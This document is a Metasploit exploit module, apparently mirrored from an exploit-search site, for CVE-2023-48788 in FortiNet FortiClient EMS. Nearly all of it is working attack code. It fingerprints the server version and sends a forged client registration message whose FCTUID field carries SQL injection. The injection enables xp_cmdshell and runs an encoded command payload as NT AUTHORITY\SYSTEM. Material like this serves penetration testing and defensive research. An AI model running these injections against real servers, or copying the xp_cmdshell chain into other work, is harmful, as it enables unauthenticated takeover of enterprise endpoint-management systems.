Share
## https://sploitus.com/exploit?id=MSF:EXPLOIT-WINDOWS-HTTP-FORTICLIENT_EMS_FCTID_SQLI-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Tcp
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FortiNet FortiClient Endpoint Management Server FCTID SQLi to RCE',
        'Description' => %q{
          An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).
          FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized
          platform for overseeing enrolled endpoints. The SQLi is vulnerability is due to user controller strings which
          can be sent directly into database queries.

          FcmDaemon.exe is the main service responsible for communicating with enrolled clients. By default it listens on port 8013
          and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.
          In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerable
          SQLi. The SQLi can used to enable the xp_cmdshell which can then be used to obtain unauthenticated remote code
          execution in the context of NT AUTHORITY\SYSTEM

          Affected versions of FortiClient EMS include:
          7.2.0 through 7.2.2
          7.0.1 through 7.0.10

          Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.

          It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient
          EMS for the necessary vulnerable services to be available.
        },
        'Author' => [
          'Zach Hanley',     # Analysis & PoC
          'James Horseman',  # Analysis & PoC
          'jheysel-r7',      # Msf module
          'Spencer McIntyre' # Msf module assistance
        ],
        'References' => [
          [ 'URL', 'https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/'],
          [ 'URL', 'https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-revisiting-fortinet-forticlient-ems-to-exploit-7-2-x/'],
          [ 'URL', 'https://github.com/horizon3ai/CVE-2023-48788/blob/main/CVE-2023-48788.py'],
          [ 'CVE', '2023-48788']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Privileged' => true,
        'Arch' => [ ARCH_CMD ],
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2024-04-21',
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 8013
        },
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ]
        }
      )
    )
  end

  def get_register_info
    if @version >= Rex::Version.new('7.2')
      vprint_status('Returning SYSINFO for 7.2 target')
      register_info = <<~REGISTER_INFO
        FCTOS=WIN64
        OSVER=Microsoft Windows 10 Professional Edition, 64-bit (build 19045)
        RSENG_VER=1.00182
        COM_MODEL=VMware7,1
        AVSIG_VER=1.00000
        UTC=1721756626
        PC_DOMAIN=kerberos.issue
        COM_MAN=VMware, Inc.
        CPU=Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz
        COM_SN=VMware-56 4d 8a d5 7b 39 3b 0d-33 c6 25 6a e4 51 f7 4d
        DHCP_SERVER=None
        FCTVER=7.2.2.0864
        EP_ONNETCHKSUM=0
        AVENG_VER=6.00287
        APPSIG_VER=28.00831
        USER=msfuser
        APPENG_VER=4.00082
        VULSIG_VER=1.00708
        AVALSIG_VER=0.00000
        VULENG_VER=2.00037
        AV_PROTECTED=1
        AVALENG_VER=0.00000
        PEER_IP=162.156.58.199
        ENABLED_FEATURE_BITMAP=16
        EP_OFFNETCHKSUM=0
        INSTALLED_FEATURE_BITMAP=420727
        EP_CHKSUM=0
        HIDDEN_FEATURE_BITMAP=418087
        GROUP_TAG=
        ENABLED_APPS=0
        INSTALLED_APPS=0
        DISKENC=
        HOSTNAME=client
        AV_PRODUCT=Microsoft Defender Antivirus
        FCT_SN=FCT8003173689730
        INSTALLUID=#{Faker::Internet.uuid.upcase}
        NWIFS=Ethernet0|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|1|*|0
        MEM=16383
        HDD=119
        DOMAIN=
        WORKGROUP=
        USER_SID=S-1-5-21-#{rand(9) * 10}-#{rand(9) * 10}-#{rand(9) * 10}-500
        ADGUID=
        EP_FGTCHKSUM=0
        EP_RULECHKSUM=0
        WF_FILESCHKSUM=0
        EP_APPCTRLCHKSUM=0
      REGISTER_INFO
    else
      vprint_status('Returning SYSINFO for 7.0 target')
      register_info = <<~REGISTER_INFO
        AVSIG_VER=1.00000
        REG_KEY=_
        EP_ONNETCHKSUM=0
        AVENG_VER=6.00266
        DHCP_SERVER=None
        FCTOS=WIN64
        VULSIG_VER=1.00000
        FCTVER=7.0.7.0345
        APPSIG_VER=13.00364
        USER=Administrator
        APPENG_VER=4.00082
        AVALSIG_VER=0.00000
        VULENG_VER=2.00032
        OSVER=Microsoft Windows Server 2019 , 64-bit (build 17763)
        COM_MODEL=VMware Virtual Platform
        RSENG_VER=1.00020
        AV_PROTECTED=0
        AVALENG_VER=0.00000
        PEER_IP=
        ENABLED_FEATURE_BITMAP=49
        EP_OFFNETCHKSUM=0
        INSTALLED_FEATURE_BITMAP=158583
        EP_CHKSUM=0
        HIDDEN_FEATURE_BITMAP=155943
        DISKENC=
        HOSTNAME=CYBER-RETQB1FLP
        AV_PRODUCT=
        FCT_SN=FCT8001638848651
        INSTALLUID=#{Faker::Internet.uuid.upcase}
        NWIFS=Ethernet0|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|1|*|0
        UTC=1710271774
        PC_DOMAIN=
        COM_MAN=VMware, Inc.
        CPU=Intel(R) Xeon(R) Silver 4215 CPU @ 2.50GHz
        MEM=12287
        HDD=99
        COM_SN=VMware-42 04 ed 2d 64 e8 0b 14-45 e9 e4 f6 5a c7 67 82
        DOMAIN=
        WORKGROUP=WORKGROUP
        USER_SID=S-1-5-21-#{rand(9) * 10}-#{rand(9) * 10}-#{rand(9) * 10}-500
        GROUP_TAG=
        ADGUID=
        EP_FGTCHKSUM=0
        EP_RULECHKSUM=0
        WF_FILESCHKSUM=0
        EP_APPCTRLCHKSUM=0
      REGISTER_INFO
    end
    Rex::Text.encode_base64(register_info)
  end

  def get_version
    message = "MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD\n"
    message << "SIZE=    {SIZE_PLACEHOLDER}\n"
    message << "X-FCCK-PROBE: PROBE_FEATURE_BITMAP0|1|\n"
    message << 'X-FCCK-PROBE-END'
    message << "\r\n"
    message << "\r\n"
    message_length = message.length
    message_length = message_length - '{SIZE_PLACEHOLDER}'.length + message_length.to_s.length
    message.gsub!('{SIZE_PLACEHOLDER}', message_length.to_s)

    buf = send_message(message)
    # Example response from a 7.2.2 target:
    # FGT|FCTEMS0000127184:dc2|FEATURE_BITMAP|7|EMSVER|7002002|PROTO_VERSION|1.0.0|PERCON|1|
    # 7.0.7:
    # FGT|FCTEMS0000125975:dc2.kerberos.issue|FEATURE_BITMAP|7|EMSVER|7000007|
    if buf =~ /EMSVER\|(\d{2})(\d{2})(\d{3})\|/
      major = (::Regexp.last_match(1).to_i / 10)
      minor = ::Regexp.last_match(2).to_i
      patch = ::Regexp.last_match(3).to_i
      return Rex::Version.new("#{major}.#{minor}.#{patch}")
    end
    nil
  end

  def get_message(sqli)
    message = "MSG_HEADER: FCTUID={SQLI_PLACEHOLDER}\n"
    message << "SIZE=     {SIZE_PLACEHOLDER}\r\n"
    message << "\n"
    # For 7.0 versions the register info gets placed after two pipe operators, for 7.2 it gets placed in between.
    if @version >= Rex::Version.new('7.2')
      message << "X-FCCK-REGISTER:SYSINFO|#{get_register_info}|\r\n"
    else
      message << "X-FCCK-REGISTER:SYSINFO||#{get_register_info}\r\n"
    end
    message << "\n"
    message << 'X-FCCK-REGISTER-END'
    message << "\r\n\r\n"
    message.gsub!('{SQLI_PLACEHOLDER}', sqli)
    message_length = message.length
    message_length = message_length - '{SIZE_PLACEHOLDER}'.length + message_length.to_s.length
    message.gsub!('{SIZE_PLACEHOLDER}', message_length.to_s)
    message
  end

  def send_message(message)
    vprint_status("Sending the following message:\n #{message}")

    buf = ''
    begin
      connect(true, { 'SSL' => true })
      sock.put(message)
      buf = sock.get_once || ''
    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    ensure
      disconnect
    end
    vprint_status("The response received was: #{buf}")
    buf
  end

  def check
    @version = get_version
    return CheckCode::Unknown("#{peer} - Version info was unable to be extracted from the target. FmcDaemon.exe might not be running.") unless @version

    if @version.between?(Rex::Version.new('7.2.0'), Rex::Version.new('7.2.2')) || @version.between?(Rex::Version.new('7.0.1'), Rex::Version.new('7.0.10'))
      return CheckCode::Appears("Version detected: #{@version}")
    end

    CheckCode::Safe("Version detected: #{@version}")
  end

  def exploit
    # Things to note:
    # 1. xp_cmdshell is disabled by default so we must enable it.
    # 2. The application takes the SQL statement we inject into and converts the string to upper case. This is why the
    #    payload is converted to a case insensitive encoding like URL or hex before running the command with xp_command shell.
    # 3. We don't expect a response when delivering the payload
    # 4. The double quote is a bad char in the SQLi for 7.0.x versions
    # 5. The equals sign is a bad char in the SQLi for 7.2.x versions

    @version ||= get_version

    if @version >= Rex::Version.new('7.2')
      pload = "EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND \"\"Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE(\"\"\"#{Rex::Text.uri_encode(payload.encoded, 'hex-all')}\"\"\"))\"\"'"
    else
      pload = "DECLARE @SQL VARCHAR(#{payload.encoded.length}) = CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first}); exec xp_cmdshell @sql"
    end

    sqli_injection = "';EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; #{pload};--"
    send_message(get_message(sqli_injection)).empty? ? print_good("The SQLi: #{sqli_injection} was executed successfully") : print_error('The SQLi injection response indicated the injection was unsuccessful.')
  end
end